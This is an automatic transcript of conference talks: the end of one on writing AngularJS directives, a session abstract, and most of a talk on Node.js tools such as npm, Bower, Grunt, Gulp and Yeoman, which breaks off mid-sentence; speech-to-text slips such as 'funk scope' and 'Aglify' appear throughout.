function, inside of some other directive, you have the ability to tell Angular, hey, I have this alert directive. In order for me to work, I require some other directive as a sibling or as a parent. And I need to talk to the other controller so that I can tell it that certain things have happened inside of my alert. This happens all the time with ngModel and ngForm. I don't know how much Angular you've done or if you've done any form validation with Angular. But if I say form name equals editForm, form, in case you didn't know it, is an Angular directive. So literally, someone has written in Angular app.directive form because you can take control of just regular HTML elements. They don't have to be special. Well, and then inside of that form, I have an input type equals whatever, but it has an ngModel equals username, something like that. ngModel asks for the ngForm controller so that it has an object it can walk up to and say, someone just entered text into me, so consider yourself dirty. Or someone just wiped out all of the text inside of this input, and there's a required attribute here. So dear form, please consider ourselves invalid. And ngModel and ngForm have this communication back and forth because they look kind of like this. Let me show you an example using a slightly different project so I don't have to type out all the code. But let me start from here. Here's a slightly different alert. This one has an alert header directive nested inside of it. So if I look at the definition for this alert header, what I will find is that alert header says, hey, I require two controllers. This is a way to say that I require other directives to be in place. And again, it's a weird, goofy syntax. And it's an array, so it actually requires two things. First of all, this is saying I need a parent alert. That means I am so sorry about random jumping around. Let me close some windows so that I am always opening up the right window here. Start this again real quick. I require a parent alert. In other words, if alert header was not inside of an alert, there would be a problem because that one line of code says alert header, I need an alert to be a parent somewhere. Please give me a reference to that controller. And then I need my own controller to be passed into me. That will always pass because if you are an alert header and you need an alert header controller, it will just happen. So the way this works is when you require other directives to be present, they will be passed in to this controller parameter, which is really controllers because it can be an array if you require multiple things. And the first thing in here will be the first thing you require. And the second thing in here will be the second thing that you require. So now inside of my linking function, I have access to two controllers that have an API. And when things happen, like a click event, I can walk up and invoke methods on those other controllers. This is not something we do in regular Angular outside of directives. You don't get references to other controllers and invoke things on them. But it happens with directives quite frequently because they're so bound to the DOM and they are the plumbing that makes things work. What is modify reason? Or look at modify reason on the alert controller. There's alert. It specified a controller of alert controller. So that's way up here. It provided an API for other things to call into it and modify something, tell it to do something. Let me show you another example. This is a little directive that I had to, sorry about that. Well, you might not be able to see it. This is a little directive I had to write because I wanted to be able to create an inline editable table. I wanted to be able to write TD with the content editable attribute, which is an HTML attribute, and then use ngModel so that I could actually push values between a table and something in my scope. And actually, to make this a little more concrete, I will flip around a little bit more and just show you something real quick, which is when I'm editing this report, I want to be able to come into, let's say, this name thing. And I want to create a table for the user where they can type in identifiers. That's interesting. Identifiers. Let's try it over here real quick. Here we go. So identify over there. I just want to do a little click on that and type. So what are these TD cells? These are TD cells with this content editable directive that you see right here. Unfortunately, if you put content editable and ngModel on a TD cell, it just doesn't magically work with Angular. ngModel doesn't exactly understand how to work with a TD cell. So I had to write a custom directive that basically says, sorry, whenever you see this attribute and you can get a hold of an ngModel controller, then what I want you to do is this. I want you to watch for any time the user basically types a key. And when that happens, I want you to read what is inside of the HTML and then maybe do some processing. But then this is the API that ngModel exposes through its controller. I'm telling ngModel, here is what is in the view. You call $viewValue on ngModel and it says, oh, that's what's in the view. OK, maybe I'll push that through onto the scope object. And that way I can get two-way data binding with this. Hopefully, that makes some sense. Here's the APIs provided by ngFormController and ngModel. How does ngModel tell the form that things are suddenly not clean or dirty anymore? Does that by calling methods when the user interacts with the page? And these are the properties that you can actually check to see if a form is valid or invalid or so forth. ngModel actually quite advanced behind the scenes. You can do things like set up formatters and parsers. So when I tell ngModel, here's a new thing from the view. It can have a collection of parsers that parse that value and turn strings into integers and things like that. And on the way back out, you can provide formatters to turn integers into, or, well, JavaScript doesn't have integers, to turn numbers into something with two points after the decimal or something like that. Hopefully, that is making sense. And yes, I'm zipping through this part of the presentation because this is the stuff that you might only need to know 10% of the time. You can get really far with directives just using the stuff that I showed you earlier. Remember to use apply. So one of the common problems I see with directives is that you're using a directive because you want to integrate with some third party jQuery plugin that you like, or because there's an event that you need to capture that Angular doesn't already provide you a directive for it. So you write something that uses element.1, hooks up to a native event, and when it happens, you start doing things that will change the scope. Angular doesn't know that that code is executing, so it doesn't do a digest phase and propagate changes unless you wrap things inside of a scope.apply. Scope.apply is the magic bit of telling Angular, hey, I'm about to do something that's going to change some scope values. So once I'm done, once you execute this function, the very next thing you probably want to do is look for anything that has changed so you can push new data into the view. Without scope.apply, you can modify things and not see the result appear on the screen, which is very mysterious. So just remember Scott Allen told you, if you modify something and it doesn't appear and there's no errors in the developer tools, make sure you don't need a scope.apply because you're doing something with native events like this. Watch is something that people will do from directives also. You want to set up a watch on some expression. So I want to watch something on my scope called text, perhaps. There's the same thing for observe. This allows you from inside of a directive to do something to the DOM element when a scope value changes. It's very useful. And yes, now we're not on the summary just yet. Compile. What I'll tell you about compile is this. Compile is only useful if you are really trying to optimize a directive. So you're writing a directive that's going to be used by lots of people and lots of other developers on mobile devices, and it does a lot of DOM manipulation. That's when you want to use compile. Because here's what compile will do. When you have a directive like this, what Angular actually does first is look in your directive definition object to see if there is a compile. Because the first thing it would call on your directive definition object before anything else is that compile function. And it'll pass you the element in that compile function so that you can do any DOM modifications that you want. If I were doing a lot of DOM modifications inside of my directive, which I'm not, then I don't need to worry about compile. I can just write a link function, and that's fine. The big difference between compile and link is this. If you're inside of an ng-repeat, and that ng-repeat executes 10 times. So just to make this a little more concrete. Div ng-repeat equals in. Sorry? Oh, I already am in a repeat. Thank you. This is the other project. Show you how this works real quick. Run in browser. Run in browser. Control-shift-w. It was setting up a repeat, and I'll make this demo code available to you so you can add new alerts dynamically. But when you're inside of a repeat, if you have a link function that does DOM modifications for this element that you need to do before you place it into the screen, if you write those DOM modifications inside of a linking function, that will have to run 10 times and modify the DOM 10 times once for each time this alert appears, if there's 10 items in alerts. The reason to use compile is because what compile can do is if you can get away with doing your DOM modifications right here, they will happen only once. And then that element that you have modified and dressed up and massaged to look just the way you want it will be cloned and stamped out 10 times to fulfill that ng-repeat. That's really one of the only reasons to write compile. I want to do one DOM modification and then clone my element multiple times to get it into the page. And then when you write a compile, you return basically your linking function. That's the linking function that we wrote. So that is a bizarre piece of Angular. If you want to see some more details about that, I'm not pushing my blog or anything, but I did a recent post. And you can actually see I have debugging output that shows you exactly when they execute, exactly what the element is at each step of compile and link. But if you remember anything from this presentation, remember that I flipped around a lot. And remember that directives can be somewhat simple, but give you some nice benefits. And with that, I will say that I think that's all I have to tell you today. I hope you enjoy the rest of the conference. Any questions? I'll get this code available somewhere. And if you want to email me to get a copy of it, just let me know. Very quiet crowd. Everyone just went to coffee. Well, thank you for coming. Thank you.
|
Directives are a powerful feature of Angular and allow you to bring future web standards into the browser today. Directives are also intimidating at first because you need to know some magical incantations to make them work correctly and efficiently. In this session we’ll build some custom directives and see how to work with scope objects, linking functions, transclusions, and other features of directives that can transform your front end development.
|
10.5446/50865 (DOI)
|
Hello everyone. I said hello. Yes, there we go. Thanks for coming out to this session. It's a very tough time slot, but that's always the case at NDC, I guess. I wanted to give you a presentation that I wish someone had done this for me at least 12 months ago, because it was about 12 months ago or maybe a little bit earlier than that when a couple people that I really respect said you should take a look at Node, because I've always been a web developer but primarily on the Microsoft stack, so even today I'm still building stuff with Visual Studio and C-Sharp and ASP.NET and every scene, WebAPI. But they encouraged me to check out this environment, and so I started taking a look at Node, and of course at that point I had a perspective on Node that I think a lot of people might share, which is I thought Node was for building server-side web applications, web pages, web APIs, that type of thing. But what I found that I really liked about the Node environment were some of the tools that you can use that don't run on the server. They run at development time or they run at build time, and those are the things that I would like to walk you through, because starting about four months ago when I launched into a new project, I decided instead of using things that are available in Visual Studio or are available on ASP.NET and NVC or available with Visual Studio plug-ins like Web Essentials, I was going to use Node tools instead, so I will show you some of those things. Why was I doing this? Because I was trying to start a new project that was slightly forward-looking and take advantage of specifications that are getting pretty solid right now, things like HTML5 and JavaScript, ECMAScript 5 and CSS3, but even pushing the edge just a little bit and looking at some of the newer APIs and ECMAScript 6 features that are coming out, I wanted to start taking advantage of those. And the problem in the Visual Studio environment is that Visual Studio has to support ASP.NET and JavaScript and things from all over the place, but when you look at the Node environment and you try to find out where are the cutting-edge tools being developed for the next version of HTML and the next version of JavaScript and all the new CSS things, it's all happening in the Node universe because Node executes JavaScript and there's a lot of JavaScript developers in that space and it is very friendly and open to open source, so a lot of people are building tools to work with the latest stuff. So let's first, just, I want to give you a really brief introduction to Node just in case you haven't seen it before. Yes, it runs on Windows, you just go to the website, you can click install, it will give you an MSI that you double click on to install it. It's only a 10 or 12 megabyte download. And session is very noisy, isn't it? And what is Node, it is literally the same JavaScript engine that is inside of Chrome, but it is packaged into an executable so that you can run Node from the command prompt or from anywhere. And once you have it downloaded and you have installed it, let me first show you that you should have a Node.js command prompt. When you click that to open it, you will be in a command prompt where Node is in your path because it is then installed under program file somewhere. So you would be able to type Node and if that is all you do, you essentially get a REPL. So you can say what is 2 plus 2, that is a 4. What if I do var name equals scott, I get back undefined because the expression was assigned to a variable and there was nothing to compute there, but if I say name, yes, it is scott, if I say name.2, uppercase, it is uppercase scott and there is even some auto completion help, if I type name. and hit tab, there is actually some introspection there that can tell me everything that I could do with a string, I could replace it, splice it, split it and things like that. So that is sort of interesting, just having a REPL, and actually I found that useful sometimes when I am trying to figure out things with like how a date behaves and I want to find what numbers are available on it and how to transform things into the proper time zone. But you can also, once I control C to get out of here, create scripts that run in Node and now if I zoom out, what I should be able to do is say something like name equals scott, console.log, name.2, uppercase, kind of the same thing we had before but now this is saved into a script file called hello.js and I should just be able to run Node hello.js and spit out the same result. So yes, you can build web applications with Node and that is usually a process of downloading a framework and starting it up with Node, telling it to listen for HTTP messages on a specific port, but we are not going to look at the server stuff, we are going to look at things that actually run here in the command line so you can run them on your developer machine, run them on your build machine and there is lots of people creating command line tools that are built on top of Node. We are going to look at some of those but just to give you an idea of what you might be able to do is there is a tool out there to search Spotify that is built on top of Node that will come back and show you things from Michael Jackson and you could play one. The problem is that really only works on the Mac book, it doesn't work on my PC. Most things are going to work on Windows just as well as they work on the Mac but there is the occasional package that you might download for Node that only works on the Mac book because it is doing something special with hardware or a speaker or something like that. To understand how to get to those things, we are going to look at a Node package manager to pull down and install these tools. It is a lot like NuGet. In fact, we are going to look at several different package managers because there is a package manager for Node modules and Node tools that will download libraries and executables that run in Node and then there are package managers for client side stuff like how do I pull down the latest version of AngularJS or Bootstrap CSS. That is a different package manager that runs on top of Node. I will show you that one. There are task runners that you can download. Task runners are all about automation. Gone are the days when you would just write some JavaScript files and inject them into a browser page using some script tags. These days we write a lot of JavaScript and we want to link the JavaScript, concatenate all the files together, minify it so it is a very small download. We might even want to do some transpiling so we want to go from copy script to JavaScript or we want to go from ECMAScript 6 and write the latest JavaScript but have it transpiled to ECMAScript 5 so it can actually run in the browsers that are available today. We will basically be looking at setting up a JavaScript build process using two very generic task running tools and then there are generators out there. You want to do some scaffolding. You want to build up an application structure really quickly. I will show you a generator that is available. All of these things, the gateway to get to all of them is through a tool called NPM which is installed when you install Node so it should just be available. There is a tremendous amount of activity in the NPM repository which is where people will create an open source project to search, spotify, or minify JavaScript files and they will bundle things up into this Node package module, upload it into that repository and then you can install things. If you are familiar with NuGet, it is just like NuGet. I want to install a package. It is going to be live in a specific location. I want to update all my packages. There is a way to just say, go out and update all the packages that I have installed for this project. In fact, there are, so NPM is a tool that you run from the command line. I can type NPM and it will bring up a help screen saying I can do things like install, I can do things like update and when I install things, there is a package manifest which I will show you that is a file that lists everything that I have installed for this particular project. Things are installed in one of two places. If I just type NPM install and some package name like Spotify to do that search, the default place will be in the directory that I am in under a subfolder called Node modules. Node really makes a distinction between two types of things that it downloads. Libraries that need to be referenced or included in some larger project and binaries which are things that you want to execute like that Spotify command that I did. Typically, you don't run binaries from your local project. If you want to run a binary like Spotify, or if you spell it correctly, then that is one of the tools that you would want to install globally with a dash G switch. That goes into a different location on my hard drive and it is a place where I can reach that tool from anywhere. You can see the location there. That is typically when Node installs. It will set that up in your path for your computer. Anytime you open up a command prompt, anything that you have installed globally, you should just be able to run from the command line. It just works. I could do something like NPM install Bower dash G. Bower is one of the tools that we are going to look at. Depending on the Wi-Fi connection, this might or might not make it. It will go out to the repository and much like NuGet, sometimes download zip files or Torrballs, bring them down to the local hard drive, explode them out, decompress them. It also understands dependencies. You can see a lot of things scrolling by now because Bower is a tool that depends on things like the underscore library. The person that builds the Bower package will just describe those dependencies in a manifest file so that NPM knows how to bring down everything that Bower needs. It looks like we completed. Since I installed that globally, I can just type Bower now. We are going to talk about what Bower is. Yes. An example of using NPM from the command line. A lot of the command line tools for Node use a CLI prefix or suffix so that you know to command line interface package as opposed to a library that you might reference. Here are the basic NPM commands that you want to know. First of all, when I am in a brand new directory and there is nothing inside of it but I am ready to start up a project, I might want to run this NPM init file. What NPM init will do is ask me a couple questions and then set up a manifest file for me. Let me just create a temp, temp directory and say NPM initialize. What is the name of my project? It is temp. What is the version I can put in? Whatever version I want. Just a bunch of basic questions so that the end result is a JSON file which looks like this. You don't need all of this stuff all the time but this is the name of my project, the version and then we are going to see that any time I install something for this project, it is going to be listed as a dependency inside of this JSON file somewhere. Backing back out for a second. This is a package.json file for a project that has a run time dependency on a Node module called Q which is quite popular for asynchronous programming and it has a development dependency on a tool called grunt which we are going to look at. NPM does allow you to make a distinction between things that have to be there to run in production like the Q library, I need that because the program actually uses that and then development dependencies which are the things that other developers will need on their workstation in order to be able to do a build. Then when you NPM install something like Q, NPM install Q, you can specify dash dash save to make sure that entry goes into the JSON file as a dependency or you could NPM install a tool and say save dev, save dev dash dev to tell NPM that this is a developer dependency so put it in that dev dependency section. Then those will all go into a folder called Node module so let me come over here and say NPM install Q dash save that installs Q, very small library so that was very quick. Look at package.json you can now see that is a dependency and if I go into Node modules there will be a Q folder there. One of the nice things that NPM will do is always install these things into their own dedicated folder and it's actually pretty good at managing dependencies because if Q did have a dependency on some other library let's call it foo version 1 that will actually be nested under here, it won't be another top level folder and that just means if I install two things and one depends on foo version 1 and this one depends on foo version 2 since those dependencies are nested under those separate top level folders it actually all just works and part of that is because of the way the Node module system works because those pieces are completely isolated from each other when they are running. But then what you typically do when you are working on source controls you don't check in the Node modules folder just like with NuGet it's quite common to not check in your packages folder with all the binaries in it instead you just check in package.json so another developer comes on your machine he clones the repository gets down package.json and then he'll just type npm install and that will look in the json file and say oh I see you're using Q let me bring it down and put it in here and it can track specific versions and things like that. Making sense so far? Quite wonderful. All right those are the npm basics and of course there is an uninstall command. One of the things I want to install which I installed globally already is a package manager called Bower so a different type of package manager npm is all about stuff that runs in Node or on top of Node where Bower is a package manager that is dedicated to packages like AngularJS, Bootstrap, Ember, Durandal, animate.css so anything that is a JavaScript library or framework like everything from jQuery to underscore to Angular or anything that is a CSS framework anything that loads into a browser there will probably there's a 99% chance there's going to be a Bower package for that which is one of the reasons I switched to Bower from NuGet for front end packages. Well actually there's a couple reasons. One reason is anyone today who is building a JavaScript library or framework the first package management tool they are going to target will be Bower so as soon as they release any sort of new build or patch or fix or anything like that the Bower file will be updated instantly and you can come by five minutes later and say Bower install or Bower update to the latest version and it will be there. Whereas NuGet is very much I don't want to say it's a second class citizen but there's a lot of people writing JavaScript that don't care about NuGet someone else. A third party has to write a NuGet package and a new spec file to package up that JavaScript and get it into your project. That's one reason I prefer Bower for JavaScript and CSS. The other reason is that quite honestly NuGet just has not done a good job of figuring out a convention on where to place stuff. So if you start, if you've been through this experience of NuGetting, Angular, jQuery, Bootstrap and all these other front end tools they get dumped in all sorts of places inside of your project sometimes under the scripts folder, under the content folder. They fill up quite rapidly. Factor is very unopinionated about how a package should be put together. I'll show you that. It's a bit disconcerting at times but I do know if I say Bower install Angular I know exactly what folder it's going to go into and it's going to be a folder dedicated to that Angular package. I don't have to worry about it filling up another folder inside of my project somewhere with both minified files and unminified files and source maps and all that other stuff. So Bower, you get started using that command I used earlier, npm install Bower-g to install it globally and once you have done that you will be able to Bower install different packages. The one catch is that Bower, npm sort of stands alone. If you have node installed you can use npm, you don't have to install anything else. If you install Bower the way it builds packages is to rely on a Git plant of some sort. So you will have to install a Git command line tool into Windows and you can do that with Git for Windows which used to be called msis-git. I've even had it work with posh-git which comes from the GitHub client for Windows which is a nice graphical user interface but it also taps into PowerShell to add some Git commands to it. So Bower will work with either one, just make sure you have that Git client and now just like npm, everything we learned about npm almost directly applies to Bower. There is a Bower init command that will create a JSON file for me that describes all the packages that I'm going to store. When I Bower install a package I can say please save that as a dependency or please save it as a development dependency. And then I don't have to check in my Bower components. All I have to do is check in bower.json as the name of that file and then other developers when they clone the repo they just say Bower install and poof, Bower will bring everything down and keep them up to date with what I wanted everyone to have. And then there is Bower update so I just want to update every possible package to the latest version that's out there. Always a little bit dangerous because when you update everything and change to the latest version something inside of there will break. So you'll spend a few minutes debugging things. But let's say that I wanted to come back to the previous folder I was in that was under a desktop folder unfortunately. There we go. And you can see inside of here I already have a JSON file one of my only dependencies right now is Q unit because I want to show you how to run some automated tests from here. But and that's a development dependency because I'm not going to run Q unit in production. But let's say I wanted to use AngularJS I could Bower install or even JQuery, Bower install JQuery, goes out, fetches JQuery and I forgot to put in dash dash save so I would have to come back and make sure I do that to get it into my JSON file. But once that is complete, let me open it up Explorer here. I will now have not only node modules but also Bower components and inside of Bower components I can see some things that are in the correct location. I actually installed some things here which are not in my JSON file. I actually don't need some of those. But there's JQuery and here's the disconcerting part. Bower is not opinionated about what people should put into their packages or what is the folder structure that should be underneath of this package when it has expanded. So when I Bower install JQuery I can be guaranteed that JQuery will always appear in that folder. But let me give you a different example here real quick. Let's Bower install, install, Jasmine dash save and while that's happening I'll just show you inside of JQuery there's a DIST folder. Now usually that's where you want to go. I want to go into the DIST folder because that's where they put the files that you want to use. That's the distribution. So there I can see JQuery, a minified JQuery and a source map for JQuery to help with debugging. And there's a lot of projects that will follow that same convention. All you have to do is drill into there and find that distribution directory. But then there's things like Jasmine which if I come into the Jasmine folder and go into the distribution folder there's zip files which aren't immediately helpful. What I really want is to find a jasmine.js file and a jasmine.css file. Jasmine's a test framework in case you haven't used it. And if you poke around enough you will find it in here. I believe it's under lib if I remember. These are the files that I actually want. Usually those four load into a page to run some unit tests. So there's a little bit of inconsistency there. And no one really documents where they put stuff. They just expect you to be able to bower install and figure out where it went into that folder. But it's always there somewhere. And what's that all I had to say about bower? Oh, if you're using Visual Studio, so this is kind of my common workflow now. Instead of a project I might start in Visual Studio, ASP.NET, MVC. I will check in my bower.json file at the root of the web project. And I will have my bower components folder included into the project. But not if I'm using TFS I wouldn't want to include everything because then TFS likes to check everything in. But I might cherry pick out specific files from bower components that I include into the project that's not necessary at all. So this Angular folder might contain 50 directories inside of it and 10,000 files. But really the only thing I care about from inside of Visual Studio is that one JS file that has to get loaded up. And I might pull them into the project like this just because then Visual Studio understands that JavaScript a little better. You can drag and drop that file into a web page and things like that. Otherwise developers open up the project file. If the bower components folder isn't there sometimes it's a little bit confusing. So I will include that there. If it happens to be a bigger solution that has multiple web projects inside of it then maybe move bower components out to the root of the solution. So all of those bower components can be shared from multiple web projects and just link them into that particular project. That works well. So now that you have all of those front end tools downloaded now you have to figure out how do I take this JavaScript and concatenate everything together, minify it. I'm writing so much JavaScript that I might want some sort of linting tool to run through it and tell me if there's any potential problems with the JavaScript that I have. That's where tools like grunt and gulp come in. We'll talk about grunt first. It is the oldest task runner. I don't know if it is the oldest but it's certainly more mature than the other one we'll talk about. What you do is you define tasks for grunt. I want you to look at this directory, concatenate all the files together, write a new file into this folder, then minify it, all those sorts of things. You can do that all with grunt. The way you install grunt is it's one of these command line tools that runs on top of node but there's a few command line tools for node that follow this pattern. First of all you're going to install some piece of it globally and that allows you to go up to the command line and just type grunt. But typically that piece of software is a very small wrapper around a local installation of grunt that will install in node modules underneath the current folder where you run npm. The basic idea here is that grunt CLI is brainless. It's just there so you can type grunt from the command line. All the real work is going to be done by that local installation of grunt. But that approach, what that allows for is if there's ever a breaking change in grunt, you can still have grunt version one for this project and grunt version two for this project and still be able to run grunt from the command line and not worry about having to keep all those things in sync because they both have their own local copies of grunt that when I type grunt it just gets forwarded to that. So what are some of the things you can do with grunt? Well if you like to write coffee script or type script, you can use grunt to compile those files into JavaScript. If you write less, there's a grunt task to compile less into CSS. If you use handlebars or a framework that depends on handlebars, you can pre-compile handlebar templates so that they are executable JavaScript and then that doesn't have to happen at runtime and can save you some performance. There's optimizers for required JS modules, JS Hint which is a wonderful tool to scan your JavaScript files and say, you know, you're doing something that looks a little bit fishy here. Maybe you should fix that. So let me show you a grunt file and, well, the different types of tasks that we can do with it. So if I open up gruntfile.js, the way a grunt file works is there's just three major pieces. First of all, the grunt file that you write is written as a node module. So you have to do this module.exports equals function that's literally saying, hey, I'm building this function that I'm going to give to you that you're going to invoke and pass yourself in and inside of this function I'm going to tell you everything, all the configuration options that you need to know about. Then there's this init config section. Before we talk about that, let me scroll down to the bottom and just focus on these things first. These are tasks that I need to execute. So Uglify is minification, JS Hint is linting, QUnit is a unit testing framework, watch is something that can watch the file system and run stuff whenever a file changes and can cat puts everything together. These are all additional modules that I would need installed, node modules that are going to run in node. So if I want to use JS Hint to lint my code from a grunt file, one of the things I will have to do is npm install grunt contrib.js hint, which I already have installed so I'm not going to do that again and I would usually do that with a dash, dash, save dev. So npm install grunt contrib.js hint, save dev. So that module is available to load in when grunt is executing. That's the code and the logic behind the hinting. Once that is installed with npm, then you tell grunt to load that npm task. That's basically like establishing an assembly reference. You could think of it that way. Once that is available, we'll focus on concat first, once concat is available, when I enter this configuration file, I basically need to tell concat what to do. So I want you to build a distribution of my files by looking at all the JavaScript files that are in this source folder, concatenating them together and putting them into a single file called demo.js, which is in the destination folder, or distribution folder, sorry. Let me come to that folder once and just show you that I can blow some things away inside my distribution folder. Let's get rid of everything inside of there. So that's basically empty. And then I can come in and now that I have that grunt file, sorry for making people nauseous by zooming in and zooming out, now I can say grunt concat. And by default, grunt looks for a grunt file in the same folder and I told it to run concat. So it goes into that configuration and says what is concat? Oh, I see that task. I see that you wanted to build this distribution.demo.js file and so that just happened. Now I have demo.js, which is actually just a short demonstration of putting two other JavaScript files together. Again, we still have time, right? Yeah, okay. We got slides to go through. Here's Aglify. So I want to minify that file now. I want you to build demo.min.js from that file. So let's go over and do a grunt.aglify. And it will tell me, hey, great, you just saved 10 bytes by squishing down that file. If I look at stdistribution demo.minify.js, yeah, stripped out some carriage returns and some white space, I guess. And we can continue growing through this grunt file, but you can see individual tasks here that are set up. When I run grunt qinit, I want it to load up all of the HTML files that are in my test folder and execute tests inside of a tool called phantom.js. Anyone here phantom.js? It's basically a headless web browser. So it's a web browser that doesn't have a UI, doesn't appear on the desktop, which means it's a great browser to use for things like on your build server or from the command line or for continuous integration. Unfortunately, it does have some drawbacks, it's based on WebKit, but it's not always up to date. It doesn't have some of the ES5 things that I need sometimes. But yeah, basically run my qinit test in phantom.js and tell me if things passed or not. So I just have a single simple test inside of there and it passed. And then jshint. Oh, let me show you some jshint things actually that are interesting. So this file, let me open up in source, oh no, sorry, in my test folder. I have a little bit of JavaScript here that works, but there's an issue with it. In JavaScript, there's no block scope. You probably know this already. There's no block scope in JavaScript. So if I declare a variable inside of a block like this, inside of an if condition, it's as if I declared that variable at the top of the function. So there's no real point of using the var keyword and declaring a variable inside of here. And the problem is I'm declaring it inside of here and I might be thinking JavaScript has block scope and I'm referencing it out here. It's just a mess. Well, these are the types of things that jshint can find. Currently this option is called funk scope. You look in the documentation for jshint, funk scope is an option that if you set it to true, it will no longer check for that particular condition where a variable is declared inside of a block and then used outside of it. But if I turn that flag off or remove funk scope and now I go back and say, dear grunt, please jshint my files. It will tell me that x is used out of scope. So it detects that problem and that's when I could come in and someone could fix that file by, you know, well, could initialize x to some initial value and only if true is true then we could say x is 3. That would fix that problem. I should be able to run this again and it will be happy. So those are individual tasks that I'm running with grunt and typically what you do to set up a real build system then is you define other tasks that can execute the sub tasks. So if I type grunt test, I want two things to happen. I want jshint to run over all of my files and then I want qunit to execute my unit test. The default thing, which is what we'll execute if I just type grunt with no other parameters is to go out and jshint things, run the task, concatenate everything together, basically build a distribution after all the tasks and hinting has completed. So if I just type grunt, it will go off and run all of those steps for me. So that would be, you know, something that I might do during a build and I could register as many of these different tasks as I want and use different combinations here. Now what I also have set up though is a task in here called watch. So it might be that as I'm developing, I want grunt to continually watch things in my file system and this is a template syntax. This is basically saying watch all the same files that are specified here and if any of them change, do these two things. Immediately run jshint and run qunit. So if I come out and type grunt watch, then it will tell me it is watching and it's waiting for something interesting to happen. And if I come into like a simple.js file and save it, you'll see there in the background grunt just runs everything. Runs the task, runs jshint, which is interesting. Now I do occasionally run into problems with the file system watcher, with grunt watch, where it doesn't detect changes or it doesn't detect changes in a specific folder and I thought that might have been a Windows thing but in talking to people that use OS X, it also happens there sometimes but sometimes just rebooting or resetting it helps. The other thing I've had problems with with grunt is if you start grunt watch at 9 o'clock in the morning and then you work all day and then maybe shut down the computer and come back to it in the evening, if it's been running for 10 or 12 hours, sometimes it starts creating these temporary files in the file system that you can't delete and it starts missing watches but just killing it off and restarting it works pretty well. Questions so far? Live reload, I don't have a demonstration of that but I like live reload. So live reload is a way to tell grunt that the watch task specifically to also set up a little server that listens on a specific port and then you can download an extension for Chrome. Yeah, an extension from the Chrome Web Store that sits right there in your menu that if you click that, it will communicate with the web server that grunt has set up so that anytime a JavaScript file changes, yes, all the tests will run, JS Hemp will run but it will also tell the browser to reload the current page so you just get a nice, you save a file and everything refreshes which is kind of nice. So the advantage to grunt is if you go and look at what grunt plugins are available, you will come to a page on their site that says there's almost as of this morning 3,000 different entries, 3,000 different things that you can NPM install and then load up into your grunt file and do different tasks, things like compile from TypeScript to JavaScript, minify all my images, compile my handlebar templates, minify my HTML, run my Jasmine specifications. If I'm using require.js, I can go through all the requires and figure out the dependencies and do some optimizations. Angular templates is a neat little plugin that I've used because in Angular you use a lot of partial views or HTML templates that are scattered all over your web server and every time you load up a directive or load in a new ng view, Angular has to go off and fetch that HTML. That package just builds them all together and concatenates them and loads them into a special place in Angular called the template cache so they're already in memory as soon as you download all of them, as soon as you download the JavaScript file that comes out of that, lint my CSS, lint my JSON file. All sorts of wonderful things out there for grunt. The downside to grunt is, at least for me, and I know other people that feel this way too, it's a mentally taxing exercise to modify a non-trivial grunt file because you write all these object literals that are strung together and it's very easy to forget the comma, get the source out of whack. It feels like writing XML configuration after a while, just writing all these objects everywhere. A tool that came along much later than grunt is a tool called gulp and it does the exact same things. You install it the same way. I np install globally gulp, which installs a little wrapper out there. I npm install locally this gulp tool, save that as a development dependency. The difference between grunt and gulp is that whereas grunt feels very declarative about the way you build your tasks out, gulp, you write more imperative code. You actually write JavaScript functions and have a sequence of statements inside of them. Let me show you a gulp file. That's one significant difference. I'll explain another one here in just a bit. That is our grunt file. Let me open up by killing the watch. The gulp file and scroll down a little bit. Now you can see here's grunt, here's gulp, grunt, gulp, grunt, gulp. It's like an exercise. Instead of writing object literals that say here's my configuration, what you do is say I want a task called concat. What I want you to do is go out and grab all these source files and it also understands globbing patterns. If I say star, star, slash, it would say inside the source folder and everything underneath of it, recursed through all directories, pick up all the JavaScript files. What I want to do is pipe them into the concat task which knows how to take 10 files and put them into one. The pipe is very significant because gulp really has these isolated tasks where you say, okay, I want to concatenate things. I want to have this grunt concat task which puts everything together, writes out a file. Then another step which will read that file, do something to it, write out another file or overwrite a file. With gulp, what you can do is use streams. This is using node streams behind the scenes so that there's not as much file system activity. Read all these files and just pipe them through memory to this other task to concatenate things and then pipe them through to this other task that knows how to write to the file system into the distribution directory. Gulp concat, just like grunt concat, will build a single file for me with all of my contents put together. I can do the minify, I can do JS hinting. These tasks don't have to be isolated like this. I could just have a task called build which goes from concat and pipes into this and pipes into that and pipes into another thing. Let's look at this. Not as many plugins available for gulp because it is newer. I'm still using grunt files for everything but I want to migrate to gulp. I find that managing that file is a lot easier. I should also show you down here at the bottom. There's fewer packages but all the big ones are there. You want to watch things, you want to run Q unit, you want to run jasmine, concat nation, minification, all the things that you probably need are there. Here's my default task. Just like my grunt file, how to default task. I have a default task here which is run lint everything, run the unit task, concat and everything, minify it. There's a watch task where I can say basically watch these folders. Anything changes in there? Run test. I would probably want JS hint inside of there too. Anything in this folder changes? Run this thing called tracer which I'll talk about here in just a second. That's grunt and gulp. If I were to be starting a new project today, I would try to start with gulp personally. Yes, next slide. Yeoman. Yeoman is not a tool that I've actually used extensively. I'll explain why in just a bit but I know some people who have a lot of success with it. It's basically a generator. If I don't want to start a grunt file from scratch or a jasmine test from scratch or an angular application from scratch, then I can go out and npm install yeoman globally. At that point what I could do, let's make another directory called angular and dc. I'm going to build an angular application. Hang on fingers. Angular and dc. I'll type yoangular. What that will do is scaffold out an application for me with angular.js set up. It'll ask me a few questions here. Do I want to use Twitter Bootstrap? Sure. I want to use these different angular modules. It'll spit out a whole bunch of stuff including the Bower files that I need and the npm package.json file that I need. This is all wonderful but it's all oriented really for node developers. If you try to take this particular thing that is being generated and use it from asp.nvc, it becomes a little bit difficult just because the folder structure doesn't always line up the way you want to. If you've ever thought that file new project inside a visual studio put out a lot of stuff, you can do that from the command line too. It doesn't require a UI to put 50 megabytes of stuff on the hard drive. That will continue with for a little bit. The interesting thing about yoaman though is in addition to scaffolding out big things like an entire application and this would also include everything I need for angular, inside of that scaffolding engine is also some interesting things which I want to look at and how to tweak to see if I can use them from something like an asp.nvc project. Let me kill this all. Because now once this is set up I can say yo, I want to create an Angular controller called ndc-sessions. This is nice because sometimes when I do want to create a new controller in visual studio it's a bit of a pain to go out and say I'll create this controller file over here and create the test file for it over here. That kind of makes to have. That gives you a nice little scaffolded start. If I go to app scripts, controllers, ndc-sessions.js, that's the start of a controller that I can use. If you go out and look there's documentation on how to build your own generators, your own scaffolding. There's lots of people writing all sorts of custom generators. There's people that have written generators for Angular I know that will dump out a data access layer for a particular web API or a service layer for a particular web API. It's an interesting technology. I just wanted to mention it in case it's something you could make use of. Then the last thing that I wanted to mention is Tracer. When I started a project a few months ago we were trying to be very forward looking with this particular project because it's going to be around for hopefully more than five years, 